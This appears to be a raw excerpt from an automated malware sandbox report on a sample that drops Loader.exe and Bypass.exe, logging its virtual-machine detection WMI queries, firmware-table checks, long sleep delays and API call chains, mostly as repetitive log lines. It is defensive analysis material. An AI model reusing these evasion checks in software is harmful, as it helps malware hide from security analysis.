Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599875
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599766
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599749
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599641
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599532
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599407
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599296
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599187
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599078
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598857
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598745
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598607
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598500
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598391
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598281
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598172
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598063
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597938
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597813
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597688
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597578
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597469
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597344
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597223
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597032
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 596157
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595719
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595422
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595282
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 595090
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594946
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594672
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594391
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 594188
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 593703
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 593485
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592750
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592453
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592250
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 592032
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591657
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591358
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 591063
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590907
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590516
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 590157
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589953
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589688
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589469
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 589000
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588719
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588266
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 588078
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587782
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587607
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587497
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587375
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587266
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 587155

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4354	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5482	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Window / User API: threadDelayed 4561
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Window / User API: threadDelayed 5051

Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep count: 4354 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep count: 5482 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599875s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599766s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599749s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599641s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599532s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599407s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599296s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599187s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -599078s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598969s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598857s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598745s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598607s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598500s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598391s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598281s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598172s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -598063s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597938s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597813s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597688s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597578s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597469s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597344s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597223s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -597032s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -596157s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -595969s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -595719s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -595422s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -595282s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -595090s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -594946s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -594672s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -594391s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -594188s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -593703s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -593485s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -592969s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -592750s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -592453s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -592250s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -592032s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -591657s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -591358s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -591063s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -590907s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -590516s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -590157s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -589953s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -589688s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -589469s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -589000s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -588719s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -588266s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -588078s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587782s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587607s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587497s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587375s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587266s >= -30000s
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe TID: 6160	Thread sleep time: -587155s >= -30000s

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71613B190
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7161240BC
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71614FCA0 FindFirstFileExA,	0_2_00007FF71614FCA0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF64D3340BC
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D34B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF64D34B190
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D35FCA0 FindFirstFileExA,	11_2_00007FF64D35FCA0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009DF406 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_009DF406

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF7161416A4 VirtualQuery,GetSystemInfo,

0_2_00007FF7161416A4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599875
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599766
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599749
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599641
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599532
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599407
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599296
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599187
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 599078
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598969
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598857
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598745
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598607
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598500
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598391
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598281
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598172
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 598063
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	Thread delayed: delay time: 597938
